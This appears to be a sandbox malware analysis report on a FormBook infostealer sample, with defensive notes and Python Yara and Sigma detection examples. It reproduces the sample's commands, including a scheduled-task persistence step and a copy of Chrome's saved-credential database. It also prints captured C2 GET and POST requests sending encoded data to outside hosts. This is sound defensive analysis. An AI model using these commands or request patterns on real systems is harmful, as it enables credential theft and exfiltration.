
Analysis Report xxgTjC4efAMDXvr.exe

Overview

General Information

Sample Name: xxgTjC4efAMDXvr.exe
Analysis ID: 299471
MD5: c112c3774a084041df7dd0e2d334a656
SHA1: 3681a38228d26e40150be43b23bb4a61b55a1122
SHA256: 3efb5ed25276775c95cc60b4c8227a1401f5525d629148d393f5b85c25c565ec
Tags: exe, FormBook


Detection

Family: FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • xxgTjC4efAMDXvr.exe (PID: 6548 cmdline: 'C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe' MD5: C112C3774A084041DF7DD0E2D334A656)
    • schtasks.exe (PID: 6652 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • xxgTjC4efAMDXvr.exe (PID: 6696 cmdline: {path} MD5: C112C3774A084041DF7DD0E2D334A656)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 3112 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6024 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
    • 0x183e9:$sqlite3step: 68 34 1C 7B E1
    • 0x184fc:$sqlite3step: 68 34 1C 7B E1
    • 0x18418:$sqlite3text: 68 38 2A 90 C5
    • 0x1853d:$sqlite3text: 68 38 2A 90 C5
    • 0x1842b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18553:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  (20 further entries not expanded in the report)
Note: the region at 0x1510000 reports exactly the same string offsets as the region at 0x400000, so it holds a second copy of the same unpacked image. $sequence_0 decodes as add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the timing check behind "Tries to detect virtualization through RDTSC time measurements"; the three JPCERT strings are each a 5-byte push imm32 (opcode 68) of a constant the rule names after sqlite3 step/text/blob, the calls used to read browser credential databases such as the Chrome "Login Data" file copied later in the process tree.

      Unpacked PEs

Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a507:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
    • 0x175e9:$sqlite3step: 68 34 1C 7B E1
    • 0x176fc:$sqlite3step: 68 34 1C 7B E1
    • 0x17618:$sqlite3text: 68 38 2A 90 C5
    • 0x1773d:$sqlite3text: 68 38 2A 90 C5
    • 0x1762b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17753:$sqlite3blob: 68 53 D8 7F 8C
Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  (1 further entry not expanded in the report)
Note: every offset in the .unpack listing is exactly 0xE00 below the corresponding offset in the .raw.unpack listing, and the .raw.unpack offsets equal those of the memory dumps above. These are the same bytes viewed under two layouts; when pivoting from a memory-dump offset to the dumped file, apply that constant shift rather than searching again.
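To make the Yara strings above concrete, here is an added example (not the rules' own source and not sandbox code) that scans a memory region for the quoted byte sequences, decodes the JPCERT push-immediate strings, flags the RDTSC opcode in $sequence_0, and checks the offset shift between the memory-dump and .unpack listings. The region is constructed: a zero-filled buffer with the patterns placed at arbitrary offsets, not the real dump.

```python
"""Byte-pattern scan over a memory region, as an added example.

Patterns and offsets are copied from this report's Yara match listing; the
buffer is constructed here so the scan runs offline.
"""
import struct

# Hex strings as quoted in the report's match listing.
SEQUENCES = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}

# Offsets of $sequence_0..$sequence_9 (first hit each) as listed for the
# memory dump (.sdmp) and for the unpacked PE (.unpack).
SDMP_OFFSETS = [0x98e8, 0x15685, 0x15171, 0x15787, 0x158ff,
                0xa57a, 0x143ec, 0xb273, 0x1b307, 0x1c31a]
UNPACK_OFFSETS = [0x8ae8, 0x14885, 0x14371, 0x14987, 0x14aff,
                  0x977a, 0x135ec, 0xa473, 0x1a507, 0x1b51a]


def to_bytes(hexstr: str) -> bytes:
    return bytes.fromhex(hexstr.replace(" ", ""))


def scan(buf: bytes, patterns=SEQUENCES) -> dict:
    """Map each pattern name to every offset at which it occurs in buf."""
    hits = {}
    for name, hexstr in patterns.items():
        needle, start, offs = to_bytes(hexstr), 0, []
        while (i := buf.find(needle, start)) != -1:
            offs.append(i)
            start = i + 1          # step by one so overlapping hits are kept
        if offs:
            hits[name] = offs
    return hits


def push_immediate(hexstr: str) -> int:
    """Decode a 5-byte 'push imm32' (opcode 0x68) and return the immediate.
    The JPCERT strings have this shape: a constant pushed before a call, which
    the rule names after the sqlite3 step/text/blob routines."""
    b = to_bytes(hexstr)
    if len(b) != 5 or b[0] != 0x68:
        raise ValueError("not a push imm32")
    return struct.unpack("<I", b[1:])[0]


def uses_rdtsc(hexstr: str) -> bool:
    """True if the pattern contains the RDTSC opcode (0F 31). In $sequence_0 it
    sits on an instruction boundary (add ecx,eax / rdtsc / sub eax,ecx /
    mov [ebp-4],eax); on arbitrary bytes this is only a heuristic, since the
    pair can also occur inside another instruction's operands."""
    return b"\x0f\x31" in to_bytes(hexstr)


def layout_delta(a, b) -> set:
    """Per-entry differences between two offset listings. A single value means
    the listings describe the same bytes under a constant shift."""
    return {x - y for x, y in zip(a, b)}


def build_sample_region() -> bytes:
    """Constructed 64 KiB region: zero-filled, with a few of the patterns
    placed at chosen offsets. Not the report's actual dump."""
    region = bytearray(0x10000)
    placements = [("$sequence_0", 0x1000), ("$sequence_0", 0x1200),
                  ("$sqlite3step", 0x4000), ("$sqlite3text", 0x4020)]
    for name, off in placements:
        b = to_bytes(SEQUENCES[name])
        region[off:off + len(b)] = b
    return bytes(region)


if __name__ == "__main__":
    for name, offs in scan(build_sample_region()).items():
        print(name, [hex(o) for o in offs])
    print(hex(push_immediate(SEQUENCES["$sqlite3step"])))
    print(layout_delta(SDMP_OFFSETS, UNPACK_OFFSETS))
```

Run against a real dump, replace `build_sample_region()` with the bytes of the `.sdmp` file; the offsets returned are relative to the start of the region, which is how the report lists them.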

          Sigma Overview

          System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started; Author: Joe Security
Data:
  Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp'
  CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp'
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe
  NewProcessName: C:\Windows\SysWOW64\schtasks.exe
  OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: 'C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe'
  ParentImage: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe
  ParentProcessId: 6548
  ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp'
  ProcessId: 6652
Note: the command line names C:\Windows\System32\schtasks.exe, but the image that ran is C:\Windows\SysWOW64\schtasks.exe. The sample is a 32-bit process on 64-bit Windows, so file-system redirection maps System32 to SysWOW64; detection logic should match on Image rather than on the path typed in the command line. The task name matches the file dropped to C:\Users\user\AppData\Roaming\EURYWhTdx.exe (listed under AV Detection), the likely persistence target, though the task XML itself is not shown in the report.

Sigma detected: Steal Google chrome login data
Source: Process started; Author: Joe Security
Data:
  Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\cmd.exe
  NewProcessName: C:\Windows\SysWOW64\cmd.exe
  OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  ParentCommandLine: C:\Windows\SysWOW64\cmmon32.exe
  ParentImage: C:\Windows\SysWOW64\cmmon32.exe
  ParentProcessId: 3112
  ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  ProcessId: 6024
Note: "Login Data" is Chrome's SQLite store of saved credentials. Copying it to Temp\DB1 and opening the copy, rather than the live file, is the usual stealer pattern, and it is consistent with the sqlite3 step/text/blob strings the JPCERT Yara rule matched above. The parent, cmmon32.exe (the Windows Connection Manager monitor), is a legitimate system binary that the process tree shows being spawned from the injected explorer.exe, not from any user action.
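The two Sigma hits above, rendered as plain-Python checks over process-creation events and run against the process tree this report lists. This is an added example, not Joe Security's rule source or sandbox code. The events are constructed from the report's Startup section; the explorer.exe image path is assumed (the report gives only its PID and MD5), and parent links follow the tree as drawn, so explorer.exe appears under the second sample instance that injected into it rather than under its true creator.

```python
"""Sigma-style process-creation checks over this report's process tree.

Added example: the rule bodies are a plain-Python reading of the two Sigma
titles the sandbox reported, not Joe Security's rule source. Events are
constructed from the Startup section of the report.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # path of the executable that actually ran
    cmdline: str    # command line as logged


# Constructed from the report's process tree. ppid follows the tree as drawn:
# explorer.exe (3388) sits under the second sample instance because the
# sandbox draws injection targets as children; it is not a CreateProcess
# parent. The explorer.exe path is assumed (the report lists only PID and MD5).
EVENTS = [
    ProcEvent(6548, 0, r"C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe",
              r"'C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe'"),
    ProcEvent(6652, 6548, r"C:\Windows\SysWOW64\schtasks.exe",
              r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' "
              r"/XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp'"),
    ProcEvent(6696, 6548, r"C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe", "{path}"),
    ProcEvent(3388, 6696, r"C:\Windows\explorer.exe", ""),
    ProcEvent(3112, 3388, r"C:\Windows\SysWOW64\cmmon32.exe",
              r"C:\Windows\SysWOW64\cmmon32.exe"),
    ProcEvent(6024, 3112, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' "
              r"'C:\Users\user\AppData\Local\Temp\DB1' /V"),
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
XML_ARG = re.compile(r"/XML\s+'?([^'\s]+)", re.IGNORECASE)


def rule_scheduled_task_from_temp(ev: ProcEvent) -> bool:
    """Sigma 'Scheduled temp file as task from temp location': schtasks /Create
    whose /XML task definition lives in the user's Temp directory.
    Match on ev.image, not the path in the command line: here the command line
    says System32 while the 32-bit parent was redirected to SysWOW64."""
    if not ev.image.lower().endswith(r"\schtasks.exe"):
        return False
    if "/create" not in ev.cmdline.lower():
        return False
    m = XML_ARG.search(ev.cmdline)
    return bool(m and TEMP_DIR.search(m.group(1)))


def rule_chrome_login_data_copy(ev: ProcEvent) -> bool:
    """Sigma 'Steal Google chrome login data': cmd.exe copying Chrome's
    'Login Data' SQLite file (the saved-credential store) to another path."""
    cl = ev.cmdline.lower()
    return (ev.image.lower().endswith(r"\cmd.exe")
            and "copy" in cl
            and r"\google\chrome\user data\default\login data" in cl)


def ancestry(events, pid: int) -> list:
    """Image basenames from the given PID up to the root of the tree."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        ev = by_pid[pid]
        chain.append(ev.image.rsplit("\\", 1)[-1])
        pid = ev.ppid
    return chain


RULES = (rule_scheduled_task_from_temp, rule_chrome_login_data_copy)


def evaluate(events) -> list:
    """(rule name, pid, ancestry) for every event that trips a rule."""
    return [(rule.__name__, ev.pid, ancestry(events, ev.pid))
            for ev in events for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for name, pid, chain in evaluate(EVENTS):
        print(f"{name}: pid {pid} via {' <- '.join(chain)}")
```

The ancestry walk is what turns the second hit from "cmd.exe copied a file" into the chain cmd.exe <- cmmon32.exe <- explorer.exe <- sample, which is the context an analyst needs to tie the credential copy back to the injection rather than to an interactive user.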

          Signature Overview


          AV Detection:

Multi AV Scanner detection for dropped file
  Source: C:\Users\user\AppData\Roaming\EURYWhTdx.exe; ReversingLabs: Detection: 22%
Multi AV Scanner detection for submitted file
  Source: xxgTjC4efAMDXvr.exe; ReversingLabs: Detection: 22%
Yara detected FormBook
  Source: Yara match; File source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match; File source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match; File source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match; File source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match; File source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match; File source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match; File source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORY
  Source: Yara match; File source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match; File source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPE
  Source: Yara match; File source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
  Source: C:\Users\user\AppData\Roaming\EURYWhTdx.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
  Source: xxgTjC4efAMDXvr.exe; Joe Sandbox ML: detected
  Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
  Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 4x nop then pop edi; Function: 10_2_00756C80
Source: global traffic; HTTP traffic detected:
  GET /k8b/?2dcDkN=mjsTtdnpzTBT&2d=QU/cSQlyWULsyYPN7f8pVUlciIeVDbN6hq2yW5NFQQssp9aWfv8U6s5pDOfeB2nX0463 HTTP/1.1
  Host: www.trusted-inspections.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty)
Source: global traffic; HTTP traffic detected:
  GET /k8b/?2d=fKbbjxnSdtwiJkyV4l7JfK3aT1NZ82lbA+70nBCEFJQQwMw6X0Z2v0cp648CNrXDxaoe&2dcDkN=mjsTtdnpzTBT HTTP/1.1
  Host: www.hblajiche.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty)
Source: global traffic; HTTP traffic detected:
  GET /k8b/?2d=fKbbjxnSdtwiJkyV4l7JfK3aT1NZ82lbA+70nBCEFJQQwMw6X0Z2v0cp648CNrXDxaoe&2dcDkN=mjsTtdnpzTBT HTTP/1.1
  Host: www.hblajiche.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty)
Source: global traffic; HTTP traffic detected:
  GET /k8b/?2dcDkN=mjsTtdnpzTBT&2d=SMkQ1dJlHASFxCpf/3Q/18F7mw+X92y3N7IjaU2400Q98kZWvVlmzFAE//BOXQVAl/hL HTTP/1.1
  Host: www.synertry.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty)
Source: global traffic; HTTP traffic detected:
  GET /k8b/?2d=G2e63y+YEqJJE4Cw6H5CpBVpRFZjJJTpk/5kYvmebWk4ZKuMNVRhpz6yqptgD5pJx6df&2dcDkN=mjsTtdnpzTBT HTTP/1.1
  Host: www.thegamergang.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00; Data Ascii: (empty)
Note: these GET requests carry no User-Agent header, which is what the "HTTP GET or POST without a user agent" signature keys on, while the POST requests below use an Internet Explorer 11 User-Agent (Trident/7.0; rv:11.0), the "Uses a known web browser user agent for HTTP communication" signature. The same path /k8b/ and the same two query keys (2d, 2dcDkN) are reused across all four hosts, so the path and key names, not the host, are the stable indicator.
Source: Joe Sandbox View; ASN Name: NETREGISTRY-AS-APNetRegistryPtyLtdAU
Source: Joe Sandbox View; ASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK
Source: Joe Sandbox View; ASN Name: AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.trusted-inspections.comConnection: closeContent-Length: 712Cache-Control: no-cacheOrigin: http://www.trusted-inspections.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trusted-inspections.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 59 32 7a 6d 4d 33 42 57 4b 46 6e 75 6c 62 47 4d 6a 35 70 44 58 41 31 41 68 39 6d 41 4c 37 42 37 28 4e 33 68 4e 36 46 4f 57 41 51 48 70 75 47 31 64 63 42 4f 35 70 31 72 64 5f 54 4d 42 69 54 2d 71 74 69 35 57 63 6c 44 34 72 71 44 45 64 78 57 68 39 53 67 64 65 66 4c 45 66 7e 4b 66 44 49 6e 76 31 68 67 76 6d 70 71 37 4d 61 5a 69 6f 51 7a 4f 69 69 49 41 5a 44 76 57 79 74 34 71 36 4f 78 66 47 6f 4b 65 41 54 6c 70 30 4b 74 69 32 67 71 35 75 6a 6c 31 78 72 74 47 52 74 6d 44 69 69 41 38 6c 33 69 75 79 63 36 57 42 54 39 6b 31 51 71 42 56 74 32 69 52 5a 53 34 31 4a 71 46 64 76 51 52 5a 43 32 64 63 61 33 64 36 63 4f 56 36 68 6d 39 4a 34 66 37 69 4e 72 45 70 33 4f 67 54 48 53 53 59 71 4d 41 4e 28 70 42 46 5a 52 36 42 5a 47 75 4e 70 68 55 35 6f 55 4b 38 4a 2d 59 61 39 7a 79 71 66 51 47 44 53 74 4c 56 49 50 42 43 7e 49 36 2d 55 4b 6e 4b 59 62 52 6f 36 32 4c 34 4e 70 76 5f 33 2d 53 5a 38 6b 51 77 54 55 75 30 4e 38 58 63 7a 2d 48 75 6c 66 55 59 71 65 6a 44 52 72 74 33 63 72 7e 43 28 49 31 4a 59 4f 74 54 76 67 7e 79 72 41 5a 57 6e 4a 4c 55 30 62 75 56 4e 37 42 6a 71 34 63 38 77 35 4b 47 54 41 48 52 6c 77 49 66 78 50 6e 42 45 66 4e 68 63 57 75 4c 66 41 49 43 36 39 35 4b 49 51 33 76 30 6f 45 41 6c 52 38 38 68 30 4f 36 6f 74 51 54 63 61 28 4e 6c 48 6a 6b 58 49 38 44 6e 57 77 5f 36 30 38 7a 4a 4e 33 33 46 34 42 68 78 4f 6a 67 36 50 31 67 46 70 55 31 6f 54 71 54 55 52 37 79 34 6c 71 43 4e 4e 65 43 78 64 77 6a 52 4d 76 6a 4b 56 52 5a 66 75 34 6a 51 70 6e 4b 52 34 4a 62 30 4d 57 76 69 34 67 6d 64 63 42 42 57 39 53 49 5a 75 36 
45 4f 54 66 70 53 57 79 71 44 35 51 4a 71 6e 62 72 44 77 49 63 4f 4c 74 65 7a 32 70 4e 4a 61 4b 51 31 76 4e 58 67 35 39 52 54 59 50 42 63 7a 35 75 63 53 33 4f 6f 2d 39 52 78 7a 6e 51 51 64 71 65 32 6f 61 74 42 74 7e 4b 6e 43 69 6a 52 6c 7e 68 4c 73 63 64 79 50 56 2d 69 44 4a 54 78 69 69 44 70 33 4d 71 6d 51 41 74 78 4f 69 45 70 32 6d 58 4c 48 36 73 4c 57 4e 6e 51 38 36 2d 6a 5a 31 33 4b 79 6f 4b 54 6c 31 41 4b 38 66 38 59 59 33 48 59 77 4a 74 47 32 62 49 39 35 6a 4c 4f 77 36 75 34 43 41 68 6b 5f 52 34 64 6e 41 33 36 49 34 51 38 6e 79 72 4a 52 61 50 7e 63 4b 6b 7a 61 66 4c 35 6c 7a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2d=Y2zmM3BWKFnulbGMj5pDXA1Ah9mAL7B7(N3hN6FOWAQHpuG1dcBO5p1rd_TMBiT-qti5WclD4rqDEdxWh9SgdefLEf~KfDInv1hgvmpq7MaZioQzOiiIAZDvWyt4q6OxfGoKeATlp0Kti2gq5ujl1xrtGRtmDiiA8l3iuyc6WBT9k1QqBVt2iRZS41JqFdvQRZC2dca3d6cOV6hm9J4f7iNrEp3OgTHSSYqMAN(pBFZR6BZGuNphU5oUK8J-Ya9zyqfQGDStLVIPBC~I6-UKnKYbRo62L4Npv_3-SZ8kQwTUu0N8Xcz-HulfUYqejDRrt3cr~C(I1JYOtTvg~yrAZWnJLU0buVN7Bjq4c8w5KGTAHRlwIfxPnBEfNhcWuLfAIC695KIQ3v0
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.trusted-inspections.comConnection: closeContent-Length: 169128Cache-Control: no-cacheOrigin: http://www.trusted-inspections.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trusted-inspections.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 59 32 7a 6d 4d 32 4a 6b 4d 6d 4c 37 79 35 53 4e 69 70 35 4c 46 77 70 53 73 61 66 47 4e 70 42 76 79 36 6e 50 4e 2d 35 4b 65 6c 30 56 34 2d 32 31 66 61 38 47 31 70 31 71 62 5f 54 50 46 69 58 6f 30 4b 6d 69 57 64 78 35 34 71 7e 45 4e 37 39 54 6d 74 53 4e 66 2d 54 37 4d 5f 72 59 66 42 4d 53 75 57 4e 34 6b 47 56 71 28 38 43 68 37 70 41 34 4e 6a 75 4e 4f 4a 50 71 51 7a 56 68 71 4a 57 6e 65 67 6f 6f 5a 46 37 6e 34 32 57 6b 74 57 51 4f 6f 4d 44 36 77 68 28 33 4a 32 6c 31 65 56 4b 45 78 41 58 71 71 44 63 35 49 42 61 38 68 31 67 49 46 6b 35 44 73 68 70 73 34 79 55 58 4c 49 6e 4e 56 61 48 37 66 70 72 59 57 72 49 4d 49 62 68 45 32 72 52 74 67 68 55 50 50 4a 6d 4b 6b 43 72 48 43 4b 69 63 4f 4d 6d 66 43 77 70 57 79 55 63 5f 75 65 46 70 57 35 35 30 51 72 30 2d 53 71 64 72 7e 4a 7a 